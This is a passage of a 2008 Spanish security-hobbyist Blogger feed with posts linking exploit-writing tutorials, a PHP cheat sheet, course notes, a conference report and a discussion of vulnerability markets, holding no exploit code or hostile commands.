href="http://ricardonarvaja.info/WEB/OTROS/EXPLOIT/Desarrollo%20de%20Exploits%20para%20Metasploit%203%20desde%20cero%20-%20Parte%203%20-%20+NCR_CRC%21.rar"&gt;Desarrollo de Exploits para Metasploit 3 desde cero - Parte 3 - +NCR CRC!&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Además os digo que si tenéis app vulnerables que no estén en la lista siguiente, hacérmelo saber a mi o a la cuenta de correo que sale en la siguiente web:&lt;br /&gt;&lt;a href="https://www.securinfos.info/old-softwares-vulnerable.php"&gt;https://www.securinfos.info/old-softwares-vulnerable.php&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Link del concurso:&lt;br /&gt;&lt;a href="https://www.securinfos.info/metasploit/msfxdc.php"&gt;https://www.securinfos.info/metasploit/msfxdc.php&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-9194720248667641739?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/9194720248667641739/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=9194720248667641739' title='4 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/9194720248667641739'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/9194720248667641739'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2009/02/metasploit-framework-exploits.html' title='MetaSploit Framework eXploits Development Contest'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-8501538535137307551</id><published>2008-12-06T16:02:00.003+01:00</published><updated>2008-12-06T16:41:33.108+01:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='PHP'/><title type='text'>Chuletilla sobre PHP de Emezeta</title><content type='html'>Mientras buscaba otra cosa di con esta chuleta sobre las funciones de php, parámetros, tipos de datos, etc. Está hecha por &lt;a href="http://www.emezeta.com"&gt;Manz&lt;/a&gt;, un buen trabajo que si sabéis php os interesará. Podría existir una de estas para cada lenguaje jeje. Está hecha en inglés pero es entendible por todos ya veréis.&lt;br /&gt;&lt;br /&gt;Os cuento que tiene por encima, ya que poner la imagen aquí se sale de los límites jeje.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold; font-style: italic;"&gt;Chuleta de PHP&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;---------------------&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Tipos de datos&lt;/span&gt;: boolean, integer, float...&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Comentarios&lt;/span&gt;.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Operadores&lt;/span&gt;: aritméticos, de asignación, para bits, comparación...&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Constantes&lt;/span&gt;: define, constant...&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Estructuras de Control&lt;/span&gt;: if, while, do while, switch...&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Funciones&lt;/span&gt;.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Funciones Matemáticas&lt;/span&gt;: log, rand, abs,exp...&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Tipos de Caracteres&lt;/span&gt;: ctype_alnum, ctype_alpha...&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Inclusión de Archivos&lt;/span&gt;: require, include...&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Variables predefinidas&lt;/span&gt;: $GLOBALS, $GET, $POST...&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Funciones URL&lt;/span&gt;: base64_encode, urlencode, parse_url...&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Funciones para Directorios&lt;/span&gt;: chdir, chroot,dir, opendir...&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Funciones Misceláneas&lt;/span&gt;: sleep, exit, eval...&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Funciones para Ejecutar&lt;/span&gt;: exec, passthru, shell_exec, system.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Arrays&lt;/span&gt;: matrix, array, list...&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Movimientos Básicos de Arrays&lt;/span&gt;: current, end, array_pop...&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Métodos para Ordenar Arrays&lt;/span&gt;: array_multisort, array_reverse....&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Arrays como sets(diferencia e intersecciones)&lt;/span&gt;: array_intersect, array_diff...&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Fecha y Hora&lt;/span&gt;: getdate, time, microtime...&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Parámetros de fecha&lt;/span&gt;: date(day, week, month...).&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Clase de DateTime y DateTimeZone&lt;/span&gt;: date_create, date_time_set...&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Archivos del Sistema(funciones básicas)&lt;/span&gt;: basename, chmod, rename, copy, glob...&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Cadenas&lt;/span&gt;: slashes y quotes; conversions y crypt; splits; strings y chars operations; compare; print family.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Expresiones regulares&lt;/span&gt;: POSIX Extended RegExp y Perl Compatible RegExp&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;---------------------------------------------------------------------------------------&lt;/span&gt;&lt;br /&gt;Bueno, ahí está todo lo que te vas a encontrar más completo.&lt;br /&gt;&lt;br /&gt;Lo podéis bajar de aquí: &lt;a href="http://www.emezeta.com/articulos/emezeta-card-php-cheat-sheet"&gt;&lt;span style="font-weight: bold;"&gt;http://www.emezeta.com/articulos/emezeta-card-php-cheat-sheet&lt;/span&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-8501538535137307551?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/8501538535137307551/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=8501538535137307551' title='4 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/8501538535137307551'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/8501538535137307551'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2008/12/chuletilla-sobre-php-de-emezeta.html' title='Chuletilla sobre PHP de Emezeta'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-5356767120274798684</id><published>2008-12-03T22:19:00.004+01:00</published><updated>2008-12-03T22:41:25.902+01:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Estudios'/><title type='text'>DAI - Sistemas Informáticos Multiusuario y en Red(1)</title><content type='html'>Esta asignatura la tenemos dividida en bloques. Voy a enseñaros poco a poco, de que trata cada bloque en distintos posts y que podréis aprender con ellos.&lt;br /&gt;&lt;br /&gt;El primer bloque de esta asignatura es:&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center; font-weight: bold; font-style: italic;"&gt;&lt;span style="font-size:130%;"&gt;COMUNICACIÓN Y REPRESENTACIÓN DE LA INFORMACIÓN&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style="font-weight: bold;"&gt;1- Introducción a la informática&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;2- Datos e información&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;3- Cualidades de la información&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;4- Transmisión de la información&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;5- Representación de la información&lt;/span&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Codificación binaria&lt;/li&gt;&lt;li&gt;Codificación/Decodificación&lt;/li&gt;&lt;li&gt;Sistemas de numeración&lt;/li&gt;&lt;li&gt;Teoría Formal de la Numeración&lt;/li&gt;&lt;li&gt;Sistema binario (0,1)&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Cambio de decimal a cualquier base&lt;/li&gt;&lt;li&gt;Paso de Base B a base C&lt;/li&gt;&lt;li&gt;Operaciones lógicas en binario(AND, OR, XOR, NOT)&lt;/li&gt;&lt;li&gt;Operaciones aritméticas en binario&lt;/li&gt;&lt;li&gt;Medidas&lt;/li&gt;&lt;li&gt;Sistema Octal (0-7)&lt;/li&gt;&lt;li&gt;Sistema Hexadecimal (0-F)&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Representación de los números enteros (Coma fija sin signo, con signo, Complemento a 1 y a 2, en exceso a M o sesgada, BCD empaquetado y desempaquetado, Código Gray, Cod. Biquinaria y Quibinaria y el código de los 7 segmentos)&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Representación de números reales (IEEE 754)&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Representación de alfanuméricos (FIELDATA, BCDIC, ASCII-7, ASCII EXTENDIDO, EBCDIC, UNICODE)&lt;br /&gt;&lt;/li&gt;&lt;/ul&gt;&lt;span style="font-weight: bold;"&gt;6- Redundancia en la codificación&lt;/span&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Código hamming&lt;/li&gt;&lt;li&gt;Códigos CRC&lt;/li&gt;&lt;li&gt;Código Huffman&lt;/li&gt;&lt;li&gt;Código corrector de dos entre 3 (2/3)&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;Lo más extendido es el punto 5 y 6, está algo desordenado pero en navidades si hay ganas o al final de curso o cuando ya no tenga que hacer gran cosa, poco a poco los apuntes estarán en pdf disponibles para todos, o al menos eso espero. Es mucha tarea pero se irá intentando poco a poco.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-5356767120274798684?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/5356767120274798684/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=5356767120274798684' title='3 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/5356767120274798684'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/5356767120274798684'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2008/12/dai-sistemas-informticos-multiusuario-y.html' title='DAI - Sistemas Informáticos Multiusuario y en Red(1)'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-4382257400913586115</id><published>2008-11-11T19:03:00.003+01:00</published><updated>2008-11-11T19:16:15.778+01:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Vulnerabilidades Software'/><category scheme='http://www.blogger.com/atom/ns#' term='Seguridad'/><category scheme='http://www.blogger.com/atom/ns#' term='Heap Spraying'/><title type='text'>Articulo - Explotando Activex con Heap Spraying</title><content type='html'>El mes pasado en CracksLatinos enviaron al concurso un fallito ya descubierto y explotado por shinnai en el que había que conseguir explotar una vulnerabilidad en Ultra Office, que era un programita que se podía ejecutar a través del navegador.&lt;br /&gt;&lt;br /&gt;Cuando un programa se puede ejecutar a través de el Internet Explorer como son los Activex, si éste tiene un fallo, hay formas de aprovecharse de dichos fallos de una manera muy universal, y bastante eficaz con algunas modificaciones en el exploit original de la técnica que usaremos (Heap Spraying).&lt;br /&gt;&lt;br /&gt;Así que, stack-based buffer overflow + Activex + navegador(IE) = Heap Spraying y derivados, y tendremos el control de muchos PCs con sólo poco trabajo como podéis leer en el tuto.&lt;br /&gt;Para que veáis de que trata exactamente os recomiendo que lo miréis y en internet tenéis que buscar mas información sobre ello.&lt;br /&gt;&lt;br /&gt;Habrá una segunda parte con métodos inseguros.&lt;br /&gt;&lt;br /&gt;Descarga: &lt;a href="http://ricardonarvaja.info/WEB/CONCURSOS%202008/CONCURSO%209/Concurso%209%20-%20Exploiting%20ActiveX%281%29%20-%20Trancek%20-%20password=1234.rar"&gt;Articulos - Explotando Activex con Heap Spraying&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-4382257400913586115?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/4382257400913586115/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=4382257400913586115' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/4382257400913586115'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/4382257400913586115'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2008/11/articulo-explotando-activex-con-heap.html' title='Articulo - Explotando Activex con Heap Spraying'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-364184335041587367</id><published>2008-10-27T23:10:00.005+01:00</published><updated>2008-10-29T22:34:11.063+01:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Inyección SQL'/><category scheme='http://www.blogger.com/atom/ns#' term='Charlas'/><category scheme='http://www.blogger.com/atom/ns#' term='Seguridad'/><title type='text'>Charla de Asegur@IT IV</title><content type='html'>La verdad que para ser la primera charla y encima de forma gratuita me llevo una muy buena impresión. Nada más llegar allí con los colegas, sin perdernos y a la primera ejje, vi a Chema el malignoo, y me presenté y aunque sea muy pro Microsoft ejje, es un tio de la hostia jeje, me presentó a un grupo de personas, entre ellos David Barroso, Anelkaos...Vamos que genial, la pena que no pude hacerme una foto con todos, jeje ya que tantas caras nuevas y tantos nombres no les termino de asociar jeje, espero que suban fotos y pongan los nombres de la gente que había por allí. También estaba Silverhack, David Carrasco, y Winsock con el que había quedado en ver.&lt;br /&gt;Vamos que le pude poner cara y cuerpo a mucha gente jeje. Así que un placer conocer a todos los que me presentaron y vi, a ver si me apunto a la próxima :D. Que hoy con las prisas de mis amigos no me pude quedar después de las preguntas o me quedaba sin comer hasta las 4.30 que hubiera llegado a casa ejej.&lt;br /&gt;&lt;br /&gt;Bueno respecto a la charla, vamos por partes&lt;span style="font-weight: bold;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;/span&gt;:&lt;br /&gt;&lt;br /&gt;Esteganografía 2.0&lt;/span&gt;&lt;br /&gt;A esta charla por mi parte le faltó chicha a la hora de ver como poder ocultar uno mismo los datos, y otros modos de ocultación que no sean el del bit menos significativo, aunque al ser de los más eficaces y al tener poco tiempo pues tampoco daba tiempo para mucho más. Aprendí alguna cosilla suelta pero poco más, después de todo lo que vi en el reto de mandingo con los colegas, lo demás parece fácil jeje.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Botnets 2.0&lt;/span&gt;&lt;br /&gt;Esta charla es la de David Barroso. Estuvo bastante chula porque habla de una realidad que toca de cerca muchos pcs jeje(que se lo digan a nuestros amigos zerafitos xD), además mostró las características de lo que tiene que tener una botnet, así como algunas famosas que hay, la verdad que se ven cosas interesantes.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;RFD, descarga de ficheros con Blind SQL Injection&lt;/span&gt;&lt;br /&gt;La del chemita, viendo la presentación ves porqué ha dado tantas charlas por el mundo, usa el Blind Sql Injection incluso para cagar jeje, la verdad que una de bastante nivel y que con conocimientos, práctica y paciencia, puede llegar a ser mortal muchas veces. Esto obliga a que aprenda bien el SQL y las bases de datos. Decir que espero la versión que uso privada, y que pronto publique el código :D.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Debian OpenSSL Bug&lt;/span&gt;&lt;br /&gt;Decir lo primero que el Luciano Bello es otro cachondo como el Chema jeje, todo por debian, no instales ni vista ni windows 7 cuando salga sino debian :P. Esta charla muestra la peligrosidad que tiene a veces un pequeño cambio en el código que en teoría te quita todos los errores(100 creo) y te los pone en 0, pero con mucha más peligrosidad, me refiero los errores que mostraba el &lt;a href="http://valgrind.org/"&gt;Valgrind&lt;/a&gt;, una herramienta que ayuda mucho a programadores. La cosa estaba en que calculaba una cosa de forma no muy random jeje. Bastante buena la charla también.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;¿Qué está haciendo Microsoft en seguridad?&lt;/span&gt;&lt;br /&gt;Esta decir que le pilló en una buena fecha, con la salida del bug remoto que se saltó el SDL, pero bueno...De ésta esperaba que hablase algo más de porqué se les coló el último fallo ya que estaba en la misma parte de código que un fallo anterior. Además hizo comparativas de vulnerabilidades con gráficas, pero lo que no muestra el dinero que invierte cada S.O. en mejoras, igualito el dinero que pueda gasar debian en mejoras de seguridad y en búsqueda de bugs, que lo que gasta Microsoft(Pobre Luciano Bello jeje).&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Turno de preguntas&lt;/span&gt;&lt;br /&gt;Aquí atacaron a Héctor Sánchez, el de la última charla, con preguntas un poco incómodas pero típicas, ya lo veréis cuando cuelguen los videos y el audio me imagino. Y de los demás poca cosa, al menos hasta las 2.15 que es cuando me tenía que ir.&lt;br /&gt;&lt;br /&gt;En definitiva, una buena forma de pasar el día, desayunar jeje, hablar, aprender y conocer gente.&lt;br /&gt;Espero que la próxima vez pueda estar más tiempo con todos, y si algún dia se puede y me dejan me apunto a las cervezas.&lt;br /&gt;&lt;br /&gt;Decir que subirán los videos y avisarán en el Blog de Chema, así que estar atentos.&lt;br /&gt;&lt;br /&gt;¡¡¡Saludos a todos los que vi por allí!!!&lt;br /&gt;&lt;br /&gt;PD: Además del desayuno de los organizadores, los de S21Sec nos dieron otra sorpresa, aunque quitale el palo y parece otro regalo más interesante para estar seguro...jejeje&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_L9yjBo3h8BM/SQjWiryF1TI/AAAAAAAAAB4/IkHJLHVVyvk/s1600-h/PIC_0246.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 300px;" src="http://2.bp.blogspot.com/_L9yjBo3h8BM/SQjWiryF1TI/AAAAAAAAAB4/IkHJLHVVyvk/s400/PIC_0246.JPG" alt="" id="BLOGGER_PHOTO_ID_5262692055939142962" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;/span&gt;&lt;span id="lblEventDescription"&gt;&lt;span&gt;&lt;span style=";font-family:'Comic Sans MS';font-size:9;"  &gt;&lt;span style=";font-family:Verdana;font-size:10;"  &gt;&lt;span style=""&gt;&lt;span style=";font-family:Calibri;font-size:100%;"  &gt;&lt;span style="line-height: 135%; color: rgb(0, 0, 0);font-size:8;" &gt;&lt;span style=";font-family:Verdana;font-size:85%;"  &gt;&lt;span style="line-height: 135%;font-family:'Verdana','sans-serif';font-size:10;"  &gt;&lt;span style="line-height: 135%;font-family:'Verdana','sans-serif';font-size:10;"  &gt;&lt;span style="font-family:Calibri;"&gt;&lt;span style="line-height: 135%;font-family:Consolas;font-size:12;"  &gt;&lt;span style=";font-family:Consolas;font-size:100%;"  &gt;&lt;strong&gt;&lt;span style=";font-family:'Arial','sans-serif';font-size:10;"  &gt;&lt;/span&gt;&lt;/strong&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-364184335041587367?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/364184335041587367/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=364184335041587367' title='4 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/364184335041587367'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/364184335041587367'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2008/10/charla-de-asegurit-iv.html' title='Charla de Asegur@IT IV'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_L9yjBo3h8BM/SQjWiryF1TI/AAAAAAAAAB4/IkHJLHVVyvk/s72-c/PIC_0246.JPG' height='72' width='72'/><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-6216355850539165642</id><published>2008-10-07T22:00:00.003+02:00</published><updated>2008-10-07T22:33:04.909+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Programacion'/><category scheme='http://www.blogger.com/atom/ns#' term='Estudios'/><title type='text'>Ya estoy en DAI!!!</title><content type='html'>Bueno, después de tantas vacaciones, he comenzado el curso con Desarrollo de Aplicaciones Informáticas(DAI), en teoría, en un centro con bastante prestigio de Madrid, pero hay poca gente, así que...quien sabe.&lt;br /&gt;&lt;br /&gt;Lo elegí principalmente para aprender a programar, ya que damos 12 horas semanales de programación en C, vamos que nos vamos a cansar jeje. Así podré hacer mis programas más fácilmente y me manejaré mejor que ahora, ya que normalmente parto de un código o varios por internet y lo modifico a mi gusto, lo junto, quito cosas, etc.&lt;br /&gt;&lt;br /&gt;Este primer año sólo damos 3 módulos bastante extensos.&lt;br /&gt;&lt;ol&gt;&lt;li&gt;Programación en Lenguajes Estructurados(PLE), en C.&lt;/li&gt;&lt;li&gt;Análisis y diseño de aplicaciones de gestión.&lt;/li&gt;&lt;li&gt;Sistemas monousuario y multiusuario...&lt;/li&gt;&lt;/ol&gt;Ya os iré comentando cosillas a medida que vaya aprendiendo, por ahora está bien, aunque tocar el pc poco de momento ejje.&lt;br /&gt;&lt;br /&gt;Saludosss&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-6216355850539165642?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/6216355850539165642/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=6216355850539165642' title='3 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/6216355850539165642'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/6216355850539165642'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2008/10/ya-estoy-en-dai.html' title='Ya estoy en DAI!!!'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-8962248853370491611</id><published>2008-10-03T01:46:00.002+02:00</published><updated>2008-10-03T01:54:48.509+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Yashira Masters'/><category scheme='http://www.blogger.com/atom/ns#' term='Seguridad'/><title type='text'>Retrasada la Yashira-Masters</title><content type='html'>Como era de suponer debido al poco tiempo que dimos de margen para preparar todo, y al poco tiempo que disponemos todos los admins, al final se ha retrasado sin fecha clara. Y es mejor retrasarlo y prepararlo todo correctamente que no sacarlo y que se puedan ir dando muchos errores o problemas jeje.&lt;br /&gt;&lt;br /&gt;Mientras que lo organizamos vamos encuestando por medio de yashira a la gente el formato del torneo y el diseño de las camisetas entre otras cosas.&lt;br /&gt;&lt;br /&gt;Además decir, que la encuesta es la siguiente:&lt;br /&gt;&lt;a href="http://www.yashira.org/index.php?showtopic=11831"&gt;http://www.yashira.org/index.php?showtopic=11831&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Si quereis que se agregue una cuarta opcion que sería la de todos los retos abiertos, sin puntos extras y demás, y que ganase el que antes acabase de hacer todos los retos, dejar un comentario ahi diciendolo!!!&lt;br /&gt;A mi esa idea me gusta, y la veo justa para todos.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-8962248853370491611?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/8962248853370491611/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=8962248853370491611' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/8962248853370491611'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/8962248853370491611'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2008/10/retrasada-la-yashira-masters.html' title='Retrasada la Yashira-Masters'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-2451460957706942071</id><published>2008-09-21T15:21:00.010+02:00</published><updated>2008-09-21T20:57:15.424+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Fuzzing'/><category scheme='http://www.blogger.com/atom/ns#' term='Venta de Vulnerabilidades'/><category scheme='http://www.blogger.com/atom/ns#' term='Hacking'/><category scheme='http://www.blogger.com/atom/ns#' term='Vulnerabilidades Software'/><category scheme='http://www.blogger.com/atom/ns#' term='Seguridad'/><title type='text'>Venta de Vulnerabilidades en software</title><content type='html'>Hoy en día, muchos informáticos con conocimientos sobre vulnerabilidades, explotación de las mismas, e ingeniería inversa en general, se pueden ganar un buen sueldo con la venta de lo que descubren de forma legal, vendiéndolo a empresas que tienen clientes que proteger, y reportándolo a la empresa propietaria del software afectado o a los encargados de hacer ese software.&lt;br /&gt;&lt;br /&gt;Actualmente, de forma legal conozco 2 y aunque habrá más, son las más conocidas. También hay otra que no es muy "legal" que se pueda decir, ya que vende vulnerabilidades a los que pongan el precio sin importar quien sea, pero con los datos del comprador en teoría, no directamente a la empresa que lo reportará a la afectada como debería ser para evitar problemas.&lt;br /&gt;&lt;br /&gt;Os voy a hablar un poco de las 3:&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;font-size:130%;" &gt;&lt;a href="http://www.zerodayinitiative.com/"&gt;ZeroDayInitiative(ZDI)&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;Pertenece a 3com-TippingPoint y pagan bastante bien. Es una de las 2 empresas que conozco, y la verdad, parece muy buena. Ellos te proporcionan una lista de las aplicaciones y fabricantes que seguramente acepten vulnerabilidades, y a partir de ahí, dependiendo del tipo de vulnerabilidad, uso extendido y demás de la aplicacion te pagan más o te pagan menos.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Ejemplos conocidos:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;font-family:courier new;font-size:85%;"  &gt;&lt;span&gt;Adobe Pdf Reader 8.1.2 Local and Remote Code Execution across Web Browser --&gt; 4000$&lt;/span&gt; &lt;span&gt;&lt;br /&gt;&lt;br /&gt;Adobe Flash Player 9.0.115.0 and earlier DeclareFunction2 Invalid Object Use Vulnerability --&gt; 5500$&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.infolancer.net/freelance/Javier_Vicente_Vallejo/u8tug4puj6dknkpowtx"&gt;Sacado de infolancer - 